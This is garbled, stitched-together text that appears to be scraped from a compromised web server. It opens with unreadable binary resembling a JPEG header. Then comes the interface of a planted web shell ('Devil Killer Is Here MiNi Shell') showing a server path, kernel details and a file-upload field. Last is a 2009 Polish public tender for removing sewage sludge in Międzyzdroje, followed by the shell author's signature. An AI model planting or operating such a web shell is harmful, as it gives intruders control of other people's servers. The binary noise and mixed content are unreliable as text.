JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090417/109826-N-2009.html

<p class="kh_header"><b>Międzyzdroje: Odbiór i zagospodarowanie, odzysk komunalnych osadów ściekowych z oczyszczalni ścieków w Międzyzdrojach w ilości 2 500 Mg</b><br>
<b>Numer ogłoszenia: 109826 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Spółka z o.o. , ul. Przy Wodociągach 3, 72-500 Międzyzdroje, woj. zachodniopomorskie, tel. 0-91 328 02 47, faks 0-91 328 25 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miedzyzdroje.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie, odzysk komunalnych osadów ściekowych z oczyszczalni ścieków w Międzyzdrojach w ilości 2 500 Mg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie przetargowe ma na celu wybór Wykonawcy/Odbiorcy ustabilizowanych komunalnych osadów ściekowych zgromadzonych na placu osadowym Oczyszczalni Ścieków dla Miasta i Gminy Międzyzdroje (OŚ). Wykonawca zobowiązany będzie do zagospodarowania przedmiotowych osadów, przez co rozumie się wywóz mas osadowych poza teren oczyszczalni, a następnie ich wykorzystanie z zachowaniem wymogów określonych przepisami Ustawy z dnia 27.04.2001 r. o odpadach (Dz. U. z 2007 r. Nr 39, poz. 251 z późniejszymi zmianami), Rozporządzenie Ministra Środowiska z dnia 01.08.2002 r. w sprawie komunalnych osadów ściekowych (Dz. U. Nr 134, poz. 1140 z późniejszymi zmianami), oraz Ustawy z dnia 27.04.2001 r. Prawo Ochrony Środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 z późniejszymi zmianami).
Termin wykonania przedmiotu zamówienia: od dnia podpisania umowy:
- do dnia 20.05.2009 r.  -  1 800 Mg,
- do dnia 30.11.2009 r.  -     700 Mg.
Zamawiający nie przewiduje zamówień uzupełniających.
Zamawiający nie dopuszcza składania ofert równoważnych.
Zamawiający nie dopuszcza składania ofert częściowych.
Zamawiający nie dopuszcza składania ofert wariantowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.50.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A.   O zamówienie mogą ubiegać się Oferenci, którzy spełniają następujące warunki:
A.1 Posiadają uprawnienia do występowania w obrocie prawnym, zgodnie z wymogami 
      Ustawowymi,
A.2 Dysponują potencjałem technicznym oraz pracownikami zdolnymi do wykonywania  
      danego zamówienia,
A.3 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
A.4 Posiadają zezwolenie na transport odpadów o kodzie 19.08.05. z uwzględnieniem
      osadów ściekowych,
A.5 Posiadają lub dzierżawią grunt o powierzchni niezbędnej do zagospodarowania 2 500 Mg   
      osadów do końca 2009 r. ,
A.6 Oferent zobowiązany jest do zagospodarowania osadów zgodnie z:
    - Ustawą z dnia 27.04.2001 r. Prawo Ochrony Środowiska (Dz. U. z 2008 r. Nr 25, poz.150 
      ze zmianami),
    - Ustawą z dnia 27.04.2001 r. o odpadach (Dz. U. z 2007 r. Nr 39, poz. 251 ze zmianami),
    - Rozporządzeniem Ministra Środowiska z dnia 01.08.2002 r. w sprawie komunalnych 
      osadów ściekowych (Dz. U. Nr 134, poz. 1140 ze zmianami).

B.   Z ubiegania się o zamówienie wyklucza się wykonawców, którzy:
B.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa
      zamówień publicznych opisanych w p. pkt. A.1 do A.6.
B.2 podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt. 1 do pkt. 10 
       Prawa zamówień publicznych.
B.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego 
      postępowania, lub posługiwali się w celu sporządzenia oferty osobami 
      uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców 
      w postępowaniu nie utrudnia uczciwej konkurencji,
B.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego 
      postępowania,
B.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub 
      dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty 
      zawierają błędy,
B.6 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie 
      zgodzili się na przedłużenie okresu związania ofertą.
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.

C.   Zamawiający odrzuci ofertę zgodnie z art. 89 pzp.

D.   Oferent zobowiązany jest:
D.1   przedstawić informację o planowanym sposobie i miejscu wykorzystania osadów,
D.2   dodatkowo przedstawić wielkość gruntów, przeznaczonych do nawożenia z podziałem
      na poszczególne działki, zgodnie z wyliczoną przez Zamawiającego maks. dopuszczalną
      dawką osadu mokrego na hektar, którą można wprowadzić do gruntu w ciągu roku 
     średnio w okresie 10 lat (należy podać wielkość działek oraz przewidywaną ilość osadu 
     przeznaczonego do zagospodarowania na poszczególnych działkach).
D.3   do przedstawienia do dnia podpisania umowy dokumentów poświadczających prawo 
      do dysponowania gruntem na którym przedmiotowe osady mają być wykorzystane - 
      umowy dzierżawy gruntów z Właścicielami muszą być zawarte na okres co najmniej 5 lat 
      (licząc od dnia podpisania umowy), - zgodnie z wyliczoną dawką osadów oraz zawierać 
      informacje pod uprawę jakich konkretnie roślin mają być przeznaczone grunty nawożone 
      osadami. Grunty przeznaczone do zagospodarowania osadami muszą spełniać warunki 
      określone w Ustawie z dnia 27.04.2001 r. Prawo Ochrony Środowiska (Dz. U. z 2008 r. Nr
      25, poz. 150 z późniejszymi zmianami).
      Przedstawione dokumenty poświadczające prawo do dysponowania gruntem mogą być
      przedstawione w formie oryginałów lub kserokopii poświadczonych ZA ZGODNOŚĆ Z 
      ORYGINAŁEM przez Osoby Uprawnione.
D.4   do wykorzystania komunalnych osadów ściekowych w gruncie,  z wyłączeniem gruntów 
      o których mowa w art.43, pkt. 6 Ustawy z dnia 27.04.2001 r. o odpadach (Dz. U. z 2007 r. 
      Nr 39, poz. 251),
D.5   po podpisaniu umowy przedstawić propozycję Harmonogramu Wywozu Osadów,
D.6   zapewnić własne środki transportu do wywozu przedmiotowych osadów z terenu 
      oczyszczalni do miejsca wskazanego w Programie- Instrukcji Zagospodarowania Osadów 
      zleconym przez Zamawiającego na podstawie oferty Wykonawcy.
D.7   prowadzić systematyczny wywóz osadu zgodnie z zaakceptowanym przez 
      Zamawiającego Harmonogramem Wywozu Osadów.
D.8   do wykorzystania osadu w gruncie zgodnie z opracowanym przez Zamawiającego na 
      jego koszt Programem-Instrukcją Zagospodarowania Osadów Ściekowych oraz Wielkości 
      Dawek Osadów, z uwzględnieniem aktualnych przepisów dotyczących gospodarki 
      odpadami, a w szczególności:
      - Ustawą z dnia 27 kwietnia 2001 r. Prawo Ochrony Środowiska (Dz. U. z 2008 r. Nr 25,
        poz. 150 ze zmianami),
      - Ustawą o odpadach z dnia 27 kwietnia 2001 r. (Dz. U. z 2007 r. Nr 39, poz. 251 ze zm.), 
      - Rozporządzeniem Ministra Środowiska z dnia 1 sierpnia 2002 r. w sprawie komunalnych 
        osadów ściekowych (Dz. U. Nr 134, poz. 1140 ze zmianami).
D.9   powiadomić Zamawiającego z co najmniej 3-dniowym wyprzedzeniem o terminie
      rozpoczęcia wywozu osadów oraz przedstawić listę pojazdów, które będą przeznaczone
      do wywozu z podziałem dla każdego zestawu ciągnik siodłowy + naczepa numeru 
      rejestracyjnego ciągnika i naczepy.
D.10   potwierdzać Zamawiającemu na koniec miesiąca kalendarzowego Karty Przekazania 
      Odpadu.
D.11   do 10 dnia każdego miesiąca przekazywać Zamawiającemu następujące informacje
      potrzebne do wystawienia Karty Ewidencji Komunalnych Osadów Ściekowych:
      - powierzenia stosowania komunalnych osadów ściekowych (ha),    
      - typ gleby, np.: lekka, średnia, ciężka, miejsce stosowania komunalnych osadów 
        ściekowych: miejsce oraz nazwa województwa, powiatu, gminy, numeru działki i obrębu 
        geodezyjnego,
      - cel stosowania komunalnych osadów ściekowych, zgodnie z art. 43, ust. 1 ustawy z dnia 
        27 kwietnia 2001 r. o odpadach, tj.
        a) do rekultywacji terenów, w tym  gruntów na cele rolne lub
        b) do dostosowania  gruntów do określonych potrzeb wynikających z planów gospodarki
          odpadami, planów zagospodarowania przestrzennego lub decyzji o warunkach 
          zabudowy i zagospodarowania terenu lub
        c) do uprawy roślin przeznaczonych do produkcji kompostu lub
        d) do uprawy roślin nieprzeznaczonych do spożycia i do produkcji pasz..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać:

1. Wypełniony i podpisany formularz ofertowy z Załącznikiem nr 1.
2. Aktualny odpis o działalności gospodarczej lub wyciąg z KRS, wystawiony nie wcześniej niż 
    6 miesięcy przed upływem terminu składania ofert. Za aktualny dokument uważa się
    zaświadczenie potwierdzone za zgodność z oryginałem.
3. Zaświadczenie z właściwego Urzędu Skarbowego oraz z właściwego ZUS potwierdzające,
    że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia społeczne - 
    wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Zezwolenie na prowadzenie działalności w zakresie objętym zamówieniem zgodnie z 
    Ustawą o odpadach z dnia 27.04.2001 r. (Dz. U. z 2007 r. Nr 39, poz. 251 z późn. zm.).
5. Zezwolenie na transport odpadów z uwzględnieniem odpadów o kodzie - 19.08.05.
6. Akt własności lub umowa dzierżawy uprawniająca do władania nieruchomością (gruntami) 
    o powierzchni niezbędnej do zastosowania maksymalnie 2 500 Mg osadu do końca 2009 r.
7. W przypadku gdy Oferent nie jest właścicielem gruntów oferta musi zawierać 
    oświadczenie właściciela gruntów, że został poinformowany o maks. dopuszczalnej dawce 
    osadu mokrego na hektar, którą można  wprowadzić do gruntu w ciągu roku  średnio  w 
    okresie 10 lat.

VII. Opis przygotowania oferty 

1. Oferta musi być sporządzona w języku polskim, pismem czytelnym.
2. Oferta oraz wszystkie wymagane załączniki wymagają podpisu osób uprawnionych do
    reprezentowania firmy, zgodnie z wymaganiami ustawowymi.
3. Poprawki w ofercie muszą być naniesione czytelnie oraz opatrzone podpisem osoby
    podpisującej ofertę.
4. Cena oferty musi być podana netto i brutto, cyfrowo i słownie.
5. Każdy Oferent może złożyć w niniejszym przetargu tylko jedną ofertę.
6. Ofertę składa się w jednym egzemplarzu, w dwóch kopertach.
7. Koperta zewnętrzna (nieprzejrzysta) powinna zawierać adres Zamawiającego i być 
    oznaczona Przetarg na odbiór i zagospodarowanie osadów - nie otwierać przed godz.
    11:00 dnia 27 kwietnia 2009 r..
8. Ofertę należy złożyć w siedzibie Zamawiającego.
9. Opakowanie wewnętrzne zawierające ofertę powinno być opatrzone nazwą i dokładnym
    adresem Oferenta.

VIII. Warunki umowy

1. Projekt umowy, jaka zostanie zawarta z wybranym Oferentem, stanowi załącznik Nr 2 
    do niniejszej Specyfikacji.
2. Karta przekazania odpadu wraz z kartą aplikacji komunalnych osadów ściekowych będzie
    dostarczona Zamawiającemu w ciągu 14 dni licząc od dnia zakończenia wywozu i 
    zagospodarowanego osadu. Do karty aplikacji osadu należy dołączyć pisemną informację o
    sposobie aplikacji danej partii osadu podpisaną przez osobę uprawnioną przez 
    Wykonawcę.
3. Zamawiający zobowiązuje się do przeprowadzenia badań laboratoryjnych osadów
    ściekowych i udostępnienia wyników Wykonawcy przedmiotu zamówienia przed
    rozpoczęciem wywozu.
4. Należność za odbierany osad będzie płatna po wykonaniu usługi, potwierdzona 
     protokołem odbioru osadu i przekazaniem Zamawiającemu kompletu wymaganych
     dokumentów przelewem bankowym w terminie 14 dni od daty otrzymania faktury przez 
     Zamawiającego.
5. Zamawiający zobowiązuje się do przekazania Wykonawcy wyników analiz 
     fizykochemicznych i bakteriologicznych Osadów - załącznik Nr 3.
6. W przypadku zagospodarowania Osadów w gruncie Zamawiający wykona na swój koszt 
     badania gruntów przez akredytowane Laboratorium EKO Projekt w Pszczynie.
7. Zamawiający dopuszcza możliwość zmiany miejsca składowania odpadów z jednoczesnym 
    zastrzeżeniem, że:
    - akty własności, dzierżawy lub inne dokumenty uprawniające do władania 
       nieruchomościami (gruntami), będącego we władaniu Oferenta, będą przedstawiane 
       Zamawiającemu dwa miesiące przed zmianą lokalizacji.
    - ilość przedstawionych gruntów powinny zabezpieczać wielkość niezbędną do 
      zagwarantowania odbioru maksymalnie 2 500 Mg osadu do końca roku 2009..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzyzdroje.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji Spółka z o.o. ulica Przy Wodociagach 3 72-500 Międzyzdroje pok. 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 10:00, miejsce: w siedzibie zamawiającego Zakład Wodociągów i Kanalizacji Spółka z o.o. ulica Przy Wodociagach 3 72-500 Międzyzdroje pok.2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com